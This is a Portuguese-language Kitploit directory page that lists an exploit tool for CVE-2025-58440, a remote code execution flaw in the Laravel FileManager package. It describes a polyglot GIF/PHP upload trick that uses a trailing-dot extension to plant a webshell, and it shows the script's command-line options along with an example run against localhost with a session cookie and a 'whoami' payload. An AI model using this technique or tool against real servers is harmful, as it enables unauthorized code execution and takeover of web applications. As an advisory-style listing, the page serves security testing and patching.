Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-58440 — Execução Remota de Código (RCE) via Ataque de Arquivo Poliglota e Injeção de Byte Nulo no Laravel FileManager | Kitploit
Ferramentas/GitHubGitHub/ph-hitachi/cve-2025-58440
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoDesenvolvimento de Payloads
GitHubph-hitachi/cve-2025-58440

CVE-2025-58440

Execução Remota de Código (RCE) via Ataque de Arquivo Poliglota e Injeção de Byte Nulo no Laravel FileManager

Ver Repositório
323há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-58440

Execução Remota de Código (RCE) via Ataque de Arquivo Poliglota e Injeção de Byte Nulo no Laravel FileManager

Visão Geral

O pacote unisharp/laravel-filemanager versões 2.11 são vulneráveis a Execução Remota de Código (RCE) devido à validação inadequada de tipo de arquivo durante uploads. A vulnerabilidade permite que um atacante faça upload de um arquivo PHP malicioso disfarçado de imagem GIF explorando a validação da extensão do arquivo. Especificamente, o atacante pode adicionar um ponto final (.) à extensão .php e incluir o cabeçalho GIF89a; para fazer o arquivo parecer uma imagem, contornando as verificações de validação. Isso permite que o atacante execute código PHP arbitrário no servidor, resultando em Execução Remota de Código (RCE).

  • Demonstração de Configuração Docker

Uso

root@kitploit:~
python3 CVE-2025-58440.py <target> [--flags]

Laravel File Manager  Exploit (CVE-2025-58440)

positional arguments:
  target                Target URL (e.g., 127.0.0.1:8000)

options:
  -h, --help                           show this help message and exit
  -C, --cookie COOKIE                  Session cookies
  -d, --directory DIRECTORY            Working directory (default: /tmp)
  -f, --filename FILENAME              Filename to upload (default: random)
  -p, --payload COMMAND                Command to execute through the webshell (e.g., 'id', 'whoami') (default: id)

Prova de Conceito

root@kitploit:~
python3 CVE-2025-58440.py 127.0.0.1:8000 -C "laravel-session=value" -p "whoami"
imagem
Baixar ferramenta